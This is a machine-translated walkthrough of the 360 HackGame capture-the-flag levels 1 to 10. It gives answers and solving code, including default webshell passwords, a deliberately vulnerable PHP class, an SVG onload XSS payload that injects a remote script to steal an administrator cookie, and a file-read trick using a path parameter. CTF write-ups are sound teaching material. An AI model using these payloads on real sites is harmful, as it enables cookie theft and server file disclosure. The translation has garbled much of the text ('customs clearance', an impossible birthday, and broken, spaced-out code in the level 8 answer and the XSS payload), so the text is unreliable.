360 hacker game HackGame (1-10) clearance strategy

Shaoguan address: http://attack.onebox.so.com/

Level 1
Q: The second level needs to be accessed from hack.360.cn. Simply clicking a button will not work !~~
A: Set the access path to http://hack.360.cn/. you can use the browser plug-in (HackBar) to quickly complete the configuration.
URl: http://attack.onebox.so.com/c6c299rf-check.html
Referrer: http://hack.360.cn/

Level 2
Q: Where can I find the password !~~
A: Answer: i360
Pass in an encrypted js http://attack.onebox.so.com/Public/js/encode.js
Run eval (password );

Level 3
Q: decode the following code:
0x253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344
A: Answer: welcometo360
<?php
$str = '253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344';

function hexToStr($hex)  
{
  $string="";
  for($i=0;$i<strlen($hex)-1;$i+=2)
    $string.=chr(hexdec($hex[$i].$hex[$i+1]));  
    
  return $string;
}

$str = base64_decode(urldecode(hexToStr($str)));
$arr = explode(" ",$str);
foreach($arr as $key => $val){
  echo chr($val);
}

Level 4
Q: Find the password for customs clearance from the image (uppercase letters on the image ):
A: Answer: BLACKHATWORLD
The image is a combination of two jpg images. The hidden images are extracted using JFIF.
<?php
$str = file_get_contents('pic.jpg');

file_put_contents('4.jpg',substr($str,strrpos($str,'JFIF') - strpos($str,'JFIF')));

echo '';

Level 5
Q: As a hacker, please answer the following questions:
A: php spy angel
Aspx spy admin
Jsp spy ninty

Level 6
Q: developers have poor security awareness and often forget to delete some backup files.
A: Answer: different accounts
A temporary file (. filename. swp) is generated when the vi file is edited in Linux)
Http://attack.onebox.so.com/c47e92bak-main.html.swp
<?php
   function _getNextKey()
  {
    $str = base64_encode("1776qs2p1qo056qsp7sno57nq94p734917268b79f9c2173f4e8164aee8e0eaf6");
    return md5($str);
  }
  echo _getNextKey();

Level 7
Q: tip: Based on Li Lei's personal information, you can guess the username and password of the encrypted string. Then, decrypt the encrypted string and you will get the customs clearance key!
Name: Li Lei
Birthday: February 1, March 5, 2014
QQ: 1987654321
Email: 360_lilei@sina.com
Residential Address: 101, Unit 1, building 1, No. 1, Dongcheng District, Beijing
A: Password: Lilei20140305 name + birthday (uppercase)
Encrypted string: 91199faddb0f5abe576ea087ea708172
Google Search
Answer: 360-hackgame-8-hello-world.php

The page verification code will not automatically expire

Level 8
Q: The following is a piece of PHP code. Select a code line with high-risk security vulnerabilities:
class MyTest
  {
  public function __set($key, $name)
          {
              if (isset($this->_var[$key])) {
                  return $this->_var[$key];    
              }
              return false;
          }
  
  public function SetTemplate($lang)
          {
              $lang = isset($lang) ? $lang : 'cn';
              include('template/' . $lang . '.php.html');
          }
  
  public function build($htmlfile='', $htmlpath='', $templateFile='')
          {
              $content = $this->fetch($templateFile);
              $htmlpath   = !empty($htmlpath)?$htmlpath:HTML_PATH;
              $htmlfile =  $htmlpath.$htmlfile.'HTML_FILE_SUFFIX';
              if(!is_dir(dirname($htmlfile)))
                  mkdir(dirname($htmlfile),0755,true);
              if(false === file_put_contents($htmlfile,$content))
                  throw new Exception('_CACHE_WRITE_ERROR_'.$htmlfile);
              return $content;
          }
  
  public function __set($key)
          {
              if(isset($this->_var[$key])) {
                  return $this->_var[$key];    
              }
          }
  
  public function Upload($filename)
          {
              $default_path = 'upload/';
              if (!file_exists($default_path))
                  mkdir($default_path, 0777, true);
              $destination = $default_path . basename($filename);
              echo 'Saving your image to: ' . $destination;
              $jfh = fopen($destination, 'w') or die("can't open file");
              fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']);
              fclose($jfh);
          }
  
  public function fetch($templateFile='')
          {
              return file_get_contents($templateFile);
          }
  
  public function Filter($value,$safecode)
          {
              $value = preg_replace("/(javascript：)?on(click|load|key|mouse|error|abort|move|unload|change|dblclick|move|reset|resize|submit)/i", "&111n\\2", $value);
              $value = preg_replace("/(.*?)<\/script>/si", $safecode, $value);
              $value = preg_replace("/(.*?)<\/iframe>/si", $safecode, $value);
              $value = preg_replace("/(.*?)/e", $safecode, $value);
              $value = preg_replace("//iesU", $safecode, $value);
              return $value;
          }
  
  }
A: Answer:
$ Value = preg_replace ("/(.*?) /E ", $ safecode, $ value); // execute the function Filter
$ Value = preg_replace ("// iesU", $ safecode, $ value); // Execute function Filter
Return file_get_contents ($ templateFile); // read the file function fetch
Include ('template/'. $ lang. '.php.html'); // truncation function SetTemplate
$ Destination = $ default_path. basename ($ filename); // any name function Upload
$ Jfh = fopen ($ destination, 'w') or die ("can't open file"); function Upload
Fwrite ($ jfh, $ GLOBALS ['HTTP _ RAW_POST_DATA ']); function Upload

I think there is a problem with this question. This class itself cannot run normally. There are two _ sets in it.
The reason why function build is not computed in the answer may be that the code is taken from the thinkphp framework.

Level 9
Q: this is a message board. Can you get the cookie of the message manager? Use the HTML5 Tag feature [for example, SVG tag] ~~
A: Message content: <svg/onload = document. body. appendChild (createElement (/script /. source )). src = String. fromCharCode (99,110, 103,101)
Cookie value: cc4b0a94f5a2e5a244a1cc44a7fb4cb3

10th off
Q: This guy is very lazy and does not leave anything. You can only find a solution on your own!
A: display the cookie with one more display = 5842b0a0df2d52533c241c6ec26089a8.
Add: http://attack.onebox.so.com/jdad3f8fasd0d-main.html after page address? Display = 5842b0a0df2d52533c241c6ec26089a8 find the real problem
Q: We use CentOS and APACHE to provide services for you. The customs clearance password is located at/home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt.
A: http://attack.onebox.so.com/jdad3f8fasd0d-main.html? Display = 5842b0a0df2d52533c241c6ec26089a8 & path =/home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt
Check: d914e3ecf6cc481114a3f534a5faf90b + 9fd30a9a7b2a862032dcb6374c6a827b! 3fb80afe3936b4ef0f76446ee46024d5


Closed successfully
Congratulations, you have successfully completed customs clearance. 360 Network Attack and Defense lab is looking forward to your participation